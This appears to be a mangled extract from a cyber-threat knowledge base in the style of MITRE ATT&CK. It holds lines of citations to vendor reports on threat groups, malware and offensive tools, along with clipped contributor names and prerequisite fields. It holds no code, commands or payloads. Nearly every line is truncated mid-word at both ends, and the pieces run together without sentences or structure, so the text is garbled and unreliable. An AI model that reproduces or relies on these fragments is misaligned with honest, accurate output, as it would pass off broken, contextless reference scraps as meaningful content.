(Citation: SensePost Ruler GitHub),(Citation: FireEye Outlook Dec 2019),(Citation: SensePost Outlook For
(Citation: SensePost Ruler GitHub),(Citation: SensePost Outlook Forms),(Citation: win10_asr),(Citation: Se
brahima, Mandiant; Regina Elw (Citation: GitHub PoshC2),(Citation: NCC Group Chimera January 2021),(Citation: ESET ComRAT May 202
(Citation: MoustachedBouncer ESET August 2023),(Citation: Unit42 Cannon Nov 2018),(Citation: Secureli
works; Microsoft Threat Intellige (Citation: Trend Micro TA505 June 2019),(Citation: Rostovcev APT41 2021),(Citation: IBM IcedID Novemb
(Citation: GitHub Pacu),(Citation: Roadtools),(Citation: Crowdstrike TELCO BPO Campaign December 202
Miriam Wiesner, @miriamxyra, Micr (Citation: BitDefender BADHATCH Mar 2021),(Citation: Mandiant APT41),(Citation: ESET ComRAT May 20
Miriam Wiesner, @miriamxyra, Micr (Citation: ESET Turla Lunar toolset May 2024),(Citation: NCC Group Chimera January 2021),(Citation: Emi
alOps; Ohad Zaidenberg, @ohad_m (Citation: Secureworks REvil September 2019),(Citation: Cisco Group 72),(Citation: SOCRadar INC Ransom
alOps; Ohad Zaidenberg, @ohad (Citation: CrowdStrike Scattered Spider BYOVD January 2023),(Citation: Microsoft Moonstone Sleet 2024
s, @MalwareUtkonos; Sebastian S(Citation: Google TAG COLDRIVER January 2024),(Citation: CISA Star Blizzard Advisory December 2023),(C
agkos, @emaragkos; Joas Antoni (Citation: VirusBulletin Kimsuky October 2019),(Citation: Google Iran Threats October 2021),(Citation: Se
(Citation: Crowdstrike TELCO BPO Campaign December 2022),
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Cita
(Citation: FireEye Obfuscation June 2017),(Citation: Picus Emotet Dec 2018),(Citation: Unit 42 Sofacy Feb
y Developer Platform Services ( (Citation: Picus Emotet Dec 2018),(Citation: EST Kimsuky April 2019),(Citation: ESET Grandoreiro April 20
(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: CISA Phishing)
(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Microsoft Iranian Threa
(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation: trendmicro xcsset xcode project 2020),(Citati
,
prevention systems ,(Citation: TechNet Secure Boot Process),(Citation: TCG Trusted Platform Module)
(Citation: Crowdstrike WhisperGate January 2022),(Citation: Eclypsium Trickboot December 2020),(Citati
Ability to update component dev(Citation: NCSC Cyclops Blink February 2022),(Citation: Kaspersky Equation QA),
,(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Cisco IOS Software Inte
Ryan Becwar (Citation: Ge 2011),(Citation: ESET LoJax Sept 2018),(Citation: TrendMicro Hacking Team UEFI),(Citation:
,(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Cisco IOS Software Inte
(Citation: AlienVault Sykipot 2011),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: M
eek, @ChristiaanBeek; Ryan Bec (Citation: Talos NavRAT May 2018),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Unit42 Emissary Panda M
(Citation: BitDefender BADHATCH Mar 2021),(Citation: Proofpoint Bumblebee April 2022),(Citation: IBM
(Citation: Picus Emotet Dec 2018),(Citation: Accenture MUDCARP March 2019),(Citation: CrowdStrike Pu
(Citation: MalwareTech Power Loader Aug 2013),(Citation: WeLiveSecurity Gapz and Redyms Mar 2013),
(Citation: ESET InvisiMole June 2020),
(Citation: FireEye CARBANAK June 2017),(Citation: Talos Rocke August 2018),(Citation: Zscaler Pikabot 20
(Citation: Lumen KVBotnet 2023),
(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Symantec Leafminer July 2018),(Citation
(Citation: Trend Micro DRBControl February 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citatio
(Citation: Mandiant Pulse Secure Zero-Day April 2021),
(Citation: Secureworks Karagany July 2019),(Citation: Trend Micro Waterbear December 2019),(Citation:
(Citation: TrendMicro PE_URSNIF.A2),(Citation: TrendMicro Ursnif Mar 2015),(Citation: FireEye Ursnif No
,
(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: N
(Citation: MoustachedBouncer ESET August 2023),(Citation: US-CERT TYPEFRAME June 2018),(Citation: B
(Citation: Mandiant No Easy Breach),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Mythc Docum
(Citation: Bitdefender Trickbot C2 infra Nov 2020),(Citation: FireEye APT28),(Citation: NCSC et al APT29 2
(Citation: Zscaler Higaisa 2020),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Kaspersky ProjectSa
(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: ORB
(Citation: FireEye APT32 May 2017),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Ma
tonio dos Santos, @C0d3Cr4zy, Inm (Citation: Donut Github),(Citation: ESET Turla Lunar toolset May 2024),(Citation: GitHub PowerSploit May
tress Labs; Matt Kelly, @breakersal
(Citation: Unit 42 Hildegard Malware),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citati
,
(Citation: LogRhythm WannaCry),(Citation: Novetta-Axiom),(Citation: Windows RDP Sessions)
SSH service enabled, trust relat ,(Citation: Symantec SSH and ssh-agent)
Active remote service accepting (Citation: ESET DazzleSpy Jan 2022),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Nic
(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: CISA Scattered Spider Advisory N
,
(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Github PowerShell Empire),(Citation: Coba
RDP service enabled, account in (Citation: CISA Iran Albanian Attacks September 2022),(Citation: SOCRadar INC Ransom January 2024),(C
SMB enabled; Host/network firew (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Securelist BlackEnergy Nov 2014),(Citati
An SSH server is configured and (Citation: FireEye APT40 March 2019),(Citation: Unit42 OilRig Playbook 2023),(Citation: Cobalt Strike TTP
VNC server installed and listenin(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Unit 42 Gamaredon February 20
(Citation: NCC Group Chimera January 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citatio
el Stepanic, Elastic; RedHuntLab (Citation: Kaspersky APT Trends Q1 2020),(Citation: Symantec Orangeworm April 2018),(Citation: Cybere
Removable media allowed, Autoru (Citation: FireEye APT28),(Citation: Trend Micro Qakbot May 2020),(Citation: FBI Flash FIN7 USB),(Citatio
Availability ,
Availability ,
Availability ,
Availability (Citation: Trend Micro Skidmap),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Unit 42 Rocke Januar
Availability ,
(Citation: Deply Mimikatz),(Citation: Adsecurity Mimikatz Guide),
oring, Host Intrusion Prevention (Citation: Sophos ZeroAccess),(Citation: Unit 42 Hildegard Malware),(Citation: Symantec Darkmoon Aug
Administra(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: TrendMicro EarthLusca 2022),(Citation:
(Citation: Linux at),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye Periscope March
,(Citation: Kubernetes Hardening Guide)
(Citation: ESET TeleBots Oct 2018),(Citation: Trend Micro Skidmap),(Citation: Unit 42 Rocke January 2019
(Citation: FireEye APT32 May 2017),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: Malwarebyt
,
(Citation: Unit 42 Kazuar May 2017),(Citation: Securelist ShadowPad Aug 2017),(Citation: NTT Security Fl
(Citation: Unit42 Emissary Panda May 2019),(Citation: Fortinet Agent Tesla June 2017),(Citation: Trend M
(Citation: Google EXOTIC LILY March 2022),
(Citation: MSTIC DEV-0537 Mar 2022),
,
,
,
,
,
(Citation: Google Cloud APT41 2024),(Citation: Rostovcev APT41 2021),(Citation: CISA AA24-038A PRC Cr
,
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: US District Court Indictme
h, Microsoft; Vinayak Wadhwa, SA(Citation: MSTIC DEV-0537 Mar 2022),
(Citation: KISA Operation Muzabi),(Citation: Google Cloud APT41 2024),
(Citation: ESET Lazarus Jun 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Google EXOTIC L
(Citation: DOJ Iran Indictments March 2018),(Citation: Latrodectus APR 2024),(Citation: KISA Operation M
,(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: ITSyndicate Disabling PHP functio
(Citation: CrowdStrike IceApple May 2022),(Citation: ESET IIS Malware 2021),(Citation: Dell TG-3390),(Cit
P; Kaspersky; Lucas da Silva Pere (Citation: Dragos Crashoverride 2018),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 201
,(Citation: Microsoft System Services Fundamentals)
(Citation: ESET LightNeuron May 2019),
(Citation: Volexity Exchange Marauder March 2021),(Citation: CISA Iran Albanian Attacks September 202
(Citation: GitHub Pacu),(Citation: Microsoft Developer Support Power Apps Conditional Access),(Citation
Availability (Citation: Malwarebytes AvosLocker Jul 2021),(Citation: Symantec WastedLocker June 2020),(Citation: Ca
(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: Kaspersky TajMahal April 2019),(Citation: Lumen
(Citation: Dell Wiper),(Citation: FireEye APT32 May 2017),(Citation: Cisco Talos Avos Jun 2022),(Citation:
(Citation: ESET Turla Lunar toolset May 2024),(Citation: ESET ForSSHe December 2018),(Citation: FireEye
(Citation: ESET Grandoreiro April 2020),(Citation: Forcepoint Felismus Mar 2017),(Citation: Trend Micro T
(Citation: Proofpoint TA416 Europe March 2022),
(Citation: Unit 42 ProjectM March 2016),(Citation: SocGholish-update),(Citation: PWC Yellow Liderc 2023
,
enachem Goldstein; Nikola Kovac(Citation: Kaspersky LuminousMoth July 2021),(Citation: Secureworks COBALT DICKENS September 2019
tion; Manikantan Srinivasan, NEC (Citation:
Co Microsoft Ransomware as a Service),(Citation: SocGholish-update),
Menachem Goldstein (Citation: Trend Micro DRBControl February 2020),(Citation: Lacework TeamTNT May 2021),(Citation: Se
(Citation: ESET Lazarus Jun 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Dell TG-3390),
s, HubSpot; Jeff Sakowicz, Microso(Citation: AADInternals Documentation),(Citation: Peirates GitHub),(Citation: Trend Micro Pawn Storm O
Goldstein; Microsoft Threat Intell(Citation: Kaspersky LuminousMoth July 2021),(Citation: Unit42 CookieMiner Jan 2019),(Citation: IBM Gr
hirumalai Natarajan, Mandiant; Tr(Citation: Mandiant APT29 Trello),(Citation: AADInternals Documentation),(Citation: Adsecurity Mimikatz
Kerberos authentication enabled,(Citation: STIG krbtgt reset),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Brining MimiKa
Valid domain account (Citation: DFIR Ryuk's Return October 2020),(Citation: GitHub Rubeus March 2023),(Citation: DFIR Ryuk 2
(Citation: Kerberos GNU/Linux),(Citation: on security kerberos linux),(Citation: Brining MimiKatz to Unix),
(Citation: NCC Group APT15 Alive and Strong),(Citation: GitHub Rubeus March 2023),(Citation: GitHub M
Valid domain account or the abili(Citation: Impacket Tools),(Citation: DFIR Ryuk's Return October 2020),(Citation: Mandiant_UNC2165),(C
(Citation: GitHub Mimikatz kerberos Module),(Citation: Github PowerShell Empire),(Citation: AADInterna
Analysis, Digital Certificate Val (Citation: Novetta-Axiom),(Citation: SpectorOps Code Signing Dec 2017),(Citation: Wikipedia HPKP)
(Citation: McAfee Honeybee),(Citation: CISA Iran Albanian Attacks September 2022),(Citation: ESET Herm
(Citation: FBI FLASH APT39 September 2020),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Trend Micr
; Swasti Bhushan Deb, IBM India P(Citation: 20 macOS Common Tools and Techniques),(Citation: ESET DazzleSpy Jan 2022),(Citation: Kandj
raeber, @mattifestation, Specter (Citation: Palo Alto Retefe),(Citation: Sood and Enbody),(Citation: hexed osx.dok analysis 2019),(Citation:
(Citation: Trend Micro Black Basta October 2022),(Citation: TrendMicro TA505 Aug 2019),(Citation: ESET
, SpecterOps ,
(Citation: mandiant_apt44_unearthing_sandworm),(Citation: Cadet Blizzard emerges as novel threat act
,(Citation: TechNet Secure Boot Process),(Citation: TCG Trusted Platform Module)
(Citation: trendmicro xcsset xcode project 2020),(Citation: Cider Security Top 10 CICD Security Risks),(Cit
(Citation: Trustwave GoldenSpy June 2020),(Citation: Intezer Aurora Sept 2017),(Citation: Avast CCleaner
an Maharjan, @loki248; Praetori (Citation: Lazarus APT January 2022),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024
int Min Thu Htut, Offensive Secu (Citation: Talos Cobalt Group July 2018),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: FireEye M
ja, PT Xynexis International (Citation: Kaspersky Lazarus Under The Hood APR 2017),(Citation: Group IB Silence Aug 2019),(Citation: F
(Citation: Palo Alto Reaver Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: Windows Command
,(Citation: Electron Security 2),(Citation: Electron Security 3)
(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Github Covenant),(Citation: Anomali
,
,
(Citation: Kaspersky Cloud Atlas August 2019),(Citation: EST Kimsuky April 2019),(Citation: Secureworks B
ky, Cymptom (Citation: Mandiant APT41),(Citation: Juniper IcedID June 2020),(Citation: Trend Micro Muddy Water Ma
(Citation: Cybereason Bumblebee August 2022),(Citation: RedCanary RaspberryRobin 2022),(Citation: Tre
(Citation: SentinelLabs Agent Tesla Aug 2020),
(Citation: FireEye APT32 May 2017),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citatio
ek Ltd.; James_inthe_box, Me; Ri (Citation: Unit 42 Bisonal July 2018),(Citation: Emissary Trojan Feb 2016),(Citation: Dell Sakula),(Citation:
(Citation: Red Canary Verclsid.exe),
l Vernon @shewhohacks; Praetor(Citation: FireEye APT32 May 2017),(Citation: Symantec Sowbug Nov 2017),(Citation: TrendMicro Gamar
tion; Katie Nickels, Red Canary; M(Citation: Prevailion DarkWatchman 2021),(Citation: S2W Racoon 2022),(Citation: SentinelOne Gootload
(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: NCC Group Team9 June 2020),(Citation
(Citation: Unit 42 Bisonal July 2018),(Citation: ESET ForSSHe December 2018),(Citation: Forcepoint Felism
(Citation: ESET ComRAT May 2020),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: Kaspersky Lyceum O
stopher Peacock; Liran Ravich, Ca(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: Check Point APT35 CharmPower January 202
(Citation: Symantec Orangeworm April 2018),(Citation: AlienVault Sykipot 2011),(Citation: CME Github Se
(Citation: FireEye APT32 May 2017),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: ESE
,
(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn),(Citation: Microsoft_rec_block_rules)
,
(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Symantec WastedLocker June 2020),(Ci
(Citation: Cisco Talos Intelligence Group),(Citation: win10_asr)
(Citation: Kandji Cuckoo April 2024),(Citation: ESET LoudMiner June 2019),(Citation: Securelist Calisto Jul
(Citation: McAfee Honeybee),(Citation: Trend Micro DRBControl February 2020),(Citation: NCC Group Ch
Availability (Citation: Talos Group123),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Talos Nyetya June 201
T.ORG's Cyber Threat Intelligence(Citation: Malwarebytes AvosLocker Jul 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Cybereas
Access to shared folders and con(Citation: TrendMicro Ursnif Mar 2015),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Micr
(Citation: ClearSky Lazarus Aug 2020),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Unit 42 Gam
(Citation: ESET Kobalos Feb 2021),(Citation: Umbreon Trend Micro),(Citation: Mandiant Cutting Edge Jan
(Citation: Bitdefender StrongPity June 2020),(Citation: SentinelLabs Metador Sept 2022),(Citation: Sentin
(Citation: Deep Instinct BPFDoor 2023),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation:
abriel Currie; Praetorian (Citation: group-ib_redcurl1),(Citation: Secureworks GOLD IONIC April 2024),(Citation: group-ib_redcurl2
e, Adaptforward ,
.NET Framework ,(Citation: NetSPI ClickOnce),(Citation: Microsoft Learn ClickOnce and Authenticode),(Citation: Microsoft
.NET Framework version 4 or hig(Citation: Talos Frankenstein June 2019),(Citation: Palo Alto PlugX June 2017),(Citation: Github PowerShe
hreat Intelligence Center (MSTIC)(Citation: mandiant_apt44_unearthing_sandworm),(Citation: PWC Cloud Hopper Technical Annex April 2
(Citation: GitHub Pacu),(Citation: Ensilo Darkgate 2018),(Citation: Cybereason Astaroth Feb 2019),(Citatio
(Citation: Aqua Kinsing April 2020),
(Citation: MSTIC DEV-0537 Mar 2022),
(Citation: Cisco Talos Intelligence Group),(Citation: Unit 42 Hildegard Malware),(Citation: Peirates GitHub
ense (CTID); Jay Chen, Palo Alt (Citation: Peirates GitHub),(Citation: Kubernetes Hardening Guide),(Citation: Docker Daemon Socket Pro
Access to files (Citation: Unit 42 Hildegard Malware),(Citation: Symantec Elfin Mar 2019),(Citation: Securelist BlackEner
Ability to query some Registry lo(Citation: CrowdStrike IceApple May 2022),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: group
(Citation: Symantec Elfin Mar 2019),(Citation: GitHub PowerSploit May 2012),(Citation: FireEye APT33 Gu
Kotler, SafeBreach (Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Unit 42 Hildegard Malware),(Citation: CIS
,(Citation: CloudSploit - Unused AWS Regions)
ntelligence; Pawel Partyka, Micros(Citation: Microsoft 365 Defender Solorigate),(Citation: Secureworks IRON RITUAL Profile),(Citation: MST
ntelligence; Dylan Silva, AWS Secu(Citation: CrowdStrike StellarParticle January 2022),(Citation: Microsoft POLONIUM June 2022),(Citation:
ender; Travis Smith, Tripwire (Citation: BitDefender BADHATCH Mar 2021),(Citation: NCC Group Chimera January 2021),(Citation: Cybe
Kerberos authentication enabled(Citation: Mandiant No Easy Breach),(Citation: NCSC Joint Report Public Tools),(Citation: Harmj0y DCSync
(Citation: CrowdStrike StellarParticle January 2022),(Citation: CISA Star Blizzard Advisory December 2023
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: TrendMicro Pikabot 2024),(Citation: CISA Scattered Spid
(Citation: FireEye Obfuscation June 2017),(Citation: Trend Micro Black Basta Spotlight September 2022),(
(Citation: Lacework TeamTNT May 2021),(Citation: Content trust in Docker),(Citation: Content trust in Az
(Citation: FireEye Obfuscation June 2017),(Citation: ESET Grandoreiro April 2020),(Citation: ESET EvilNum
Administra(Citation: CISA Iran Albanian Attacks September 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: M
(Citation: GitHub Pacu),(Citation: Peirates GitHub),(Citation: Mandiant Pulse Secure Update May 2021),(C
(Citation: Microsoft Albanian Government Attacks September 2022),(Citation: DFIR Phosphorus Novemb
(Citation: NCC Group Chimera January 2021),(Citation: Unit 42 Shamoon3 2018),(Citation: FireEye KEGTA
(Citation: FireEye Exchange Zero Days March 2021),(Citation: FireEye APT32 May 2017),(Citation: US-CER
(Citation: Citizen Lab Group5),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shahe
(Citation: FireEye APT28),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Cyble Egregor Oct 2020)
ostya Vasilkov (Citation: SecureList SynAck Doppelgänging May 2018),(Citation: ESET Grandoreiro April 2020),(Citation:
eff Felling, Red Canary; Jorge O (Citation: Trustwave GoldenSpy June 2020),(Citation: Trend Micro DRBControl February 2020),(Citation:
(Citation: ESET Okrum July 2019),(Citation: FireEye FIN7 April 2017),(Citation: Unit42 Molerat Mar 2020),
,
,
,
r Rajendran, Microsoft Defender (Citation: BitDefender BADHATCH Mar 2021),(Citation: Unit 42 Hildegard Malware),(Citation: Zdnet Ngro
(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Force
(Citation: Mandiant APT41),(Citation: CheckPoint Redaman October 2019),(Citation: Securelist Brazilian B
(Citation: FireEye APT29),(Citation: FireEye Periscope March 2018),(Citation: FireEye Metamorfo Apr 201
(Citation: FireEye Obfuscation June 2017),(Citation: FireEye APT32 May 2017),(Citation: Sygnia Elephant
Microsoft Core XML Services (M (Citation: ESET Lazarus Jun 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: Talos Cobalt Group
,(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Dell Sakula),(Citation: Cisco H1N1 Par

7),(Citation: Cobalt Strike Manual 4.3 November 2020),

tion: GitHub Sliver C2),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Trend Micro KillDisk 2),(Citation: CrowdStrike SUNSP
itation: Malwarebytes Konni Aug 2021),(Citation: Cisco Ukraine Wipers January 2022),(Citation: ESET Turla PowerShell May 2019),(Citation
r Technical Appendix Sept 2022),(Citation: Github_SILENTTRINITY),(Citation: cobaltstrike manual),(Citation: Microsoft runas),(Citation: Mic
.3 November 2020),(Citation: CobaltStrike Daddy May 2017),(Citation: ESET PipeMon May 2020),(Citation: Trellix Darkgate 2023),
Empire),(Citation: Adsecurity Mimikatz Guide),(Citation: Microsoft Trust Considerations Nov 2014),(Citation: Microsoft SID Filtering Quaran
October 2019),(Citation: Symantec FIN8 Jul 2023),(Citation: McAfee Shamoon December 2018),(Citation: Unit 42 Siloscape Jun 2021),(Cita
,(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Check Point Meteor Aug 2021),(Citation: CarbonBlack LockerGoga 2019),(Citation: Sentine
on: FOX-IT May 2016 Mofang),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: trendmicro xcsset xcode project 2020),(Citation: C
DInternals Documentation),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Roadtools),
Citation: SOCRadar INC Ransom January 2024),(Citation: ESET ComRAT May 2020),(Citation: Trend Micro Muddy Water March 2021),(Citati
itation: CISA Iran Albanian Attacks September 2022),(Citation: ESET Grandoreiro April 2020),(Citation: SensePost Ruler GitHub),(Citation: C
May 2012),(Citation: Mandiant APT1),(Citation: ESET ComRAT May 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Google Clou
ckbuster),(Citation: Symantec Calisto July 2018),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Dragos Crashoverride 2018
,(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Att
TELCO BPO Campaign December 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: MSTIC Octo Tempest Operations October 2023),(C

on: MSTIC Nobelium Oct 2021),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Volexity SolarWinds),(Citation: FireEye APT35 2
May 2021),(Citation: FireEye SMOKEDHAM June 2021),(Citation: FireEye APT41 Aug 2019),(Citation: aptsim),(Citation: KISA Operation Muza
AADInternals Documentation),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Mandiant APT29 Microsoft 365 202
itation: Aqua TeamTNT August 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: trendmicro xcsset xcode project 2020),(Citation:

t_UNC2165),(Citation: Mandiant APT43 March 2024),(Citation: Leonard TAG 2023),(Citation: StarBlizzard),(Citation: SentinelOne Agrius 20

orks COBALT DICKENS August 2018),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Secureworks BRONZE PRESIDENT Dece

McAfee Night Dragon),(Citation: TrendMicro EarthLusca 2022),(Citation: PWC Yellow Liderc 2023),(Citation: KISA Operation Muzabi),(Citatio

020),(Citation: Lumen KVBotnet 2023),(Citation: Gigamon Berserk Bear October 2021),(Citation: SentinelOne WinterVivern 2023),(Citation
n Lotus November 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: MSTIC NOBELIUM May 2021),(Citation: E

: Cybersecurity Advisory SVR TTP May 2021),(Citation: Rostovcev APT41 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Trend Mic

ation: objsee mac malware 2017),(Citation: CheckPoint Dok),

),(Citation: Cisco ARP Poisoning Mitigation 2016),(Citation: Juniper DAI 2020)
ols),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: GitHub Pupy),(Citation: Github PowerShell Empire),(Citation: GitHub Responde
ol February 2020),(Citation: Symantec W32.Duqu),(Citation: DFIR Phosphorus November 2021),(Citation: Unit 42 Hildegard Malware),(Cita
May 2017),(Citation: NCC Group Chimera January 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye FI
ybee),(Citation: BitDefender BADHATCH Mar 2021),(Citation: XAgentOSX 2017),(Citation: VirusBulletin Kimsuky October 2019),(Citation: ES
),(Citation: Talos NavRAT May 2018),(Citation: Palo Alto Sofacy 06-2018),(Citation: Unit42 Cannon Nov 2018),(Citation: Bitdefender Agent

nt Bot April 2021),(Citation: Kaspersky Carbanak),(Citation: MSTIC FoggyWeb September 2021),(Citation: PWC WellMess July 2020),(Citatio
May 2017),(Citation: ESET Grandoreiro April 2020),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye Metamorfo Apr 2018),(Citation: S
une 2020),(Citation: ESET Machete July 2019),(Citation: Securelist Sofacy Feb 2018),(Citation: CISA Zebrocy Oct 2020),(Citation: ESET Ocea
: ESET Machete July 2019),(Citation: Bitdefender StrongPity June 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Novetta Block
er 2021),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Cylance Dust Storm),(Citation: Trend Micro MacOS Backdoor November 2
an 2022),(Citation: Trend Micro Tick November 2019),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ESET Crutch Dece
Feb 2018),(Citation: Cylance Shaheen Nov 2018),(Citation: GitHub PowerSploit May 2012),(Citation: QiAnXin APT-C-36 Feb2019),(Citation
ZE PRESIDENT December 2019),(Citation: ATT Sidewinder January 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: objective-see w
),(Citation: Bitdefender StrongPity June 2020),(Citation: Talos Frankenstein June 2019),(Citation: Kaspersky TajMahal April 2019),(Citation:

May 2020),(Citation: FireEye Periscope March 2018),(Citation: CobaltStrike Scripted Web Delivery),(Citation: PaloAlto UBoatRAT Nov 2017
point IndigoZebra July 2021),
Mongolian Gov),(Citation: paloalto Tropic Trooper 2016),
nfigure LSA)
nCuckooBees May 2022),(Citation: Trend Micro Skidmap),(Citation: SourceForge rkhunter),(Citation: Chkrootkit Main),(Citation: Apple TN2
tation: Symantec Pasam May 2012),(Citation: Microsoft LSA Protection Mar 2014),(Citation: Microsoft Enable Cred Guard April 2017),(Cita
osx.dok analysis 2019),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Red Canary NETWIRE January 2020),

(Citation: TrendMicro EarthLusca 2022),

tation: Picus Emotet Dec 2018),(Citation: ESET Grandoreiro April 2020),(Citation: Emissary Trojan Feb 2016),(Citation: TrendMicro Gamared
GitHub PowerSploit May 2012),(Citation: PowerSploit Documentation),(Citation: Graeber 2014),(Citation: Microsoft Configure LSA)
8),(Citation: NCC Group Team9 June 2020),(Citation: Cybereason Bazar July 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation

Nov 2016),(Citation: PWC KeyBoys Feb 2017),(Citation: Unit42 Cannon Nov 2018),(Citation: Cylance Shaheen Nov 2018),(Citation: Zscaler B
lysis),(Citation: Red Canary NETWIRE January 2020),(Citation: Red Canary Netwire Linux 2022),
(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Anomali Rocke March 2019),

ct 2017),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET Attor Oct 2019),(Citation: ESET Sednit Part 1),(Citation: Unit 42 Playbook Dec 20

mbert ATTCK Oct 2021),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citati

Apr 2018),(Citation: Zdnet Kimsuky Dec 2018),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: Netscout Stolen Pencil Dec 2
2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Securelist Calisto July 201
April 2020),(Citation: Juniper IcedID June 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Microsoft Totbrick Oct
Storm Dec 2020),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: CME Github S
020),(Citation: NCC Group Chimera January 2021),(Citation: Okta Block Anonymizing Services),(Citation: Microsoft Common Conditional Ac
n: Kali Hydra),(Citation: US-CERT TA18-074A),(Citation: Cylance Cleaver),(Citation: APT3 Adversary Emulation Plan),(Citation: NIST 800-63-
018),(Citation: CIS Emotet Dec 2018),(Citation: Secureworks Emotet Nov 2018),(Citation: ESET Hermetic Wizard March 2022),(Citation: Uni
021),(Citation: GitHub MailSniper),(Citation: Microsoft Holmium June 2020),(Citation: CME Github September 2018),(Citation: Anomali Linu

gent Tesla April 2020),(Citation: ESET Machete July 2019),(Citation: Fortinet Agent Tesla June 2017),(Citation: GDATA Zeus Panda June 201
um Oct 2021),(Citation: GitHub Pacu),(Citation: Mandiant Azure Run Command 2021)

SET ForSSHe December 2018),(Citation: FireEye APT37 Feb 2018),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: FireEye FIN7 Au
dji Cuckoo April 2024),(Citation: wardle evilquest parti),(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation: MacKeeper Bundlore A
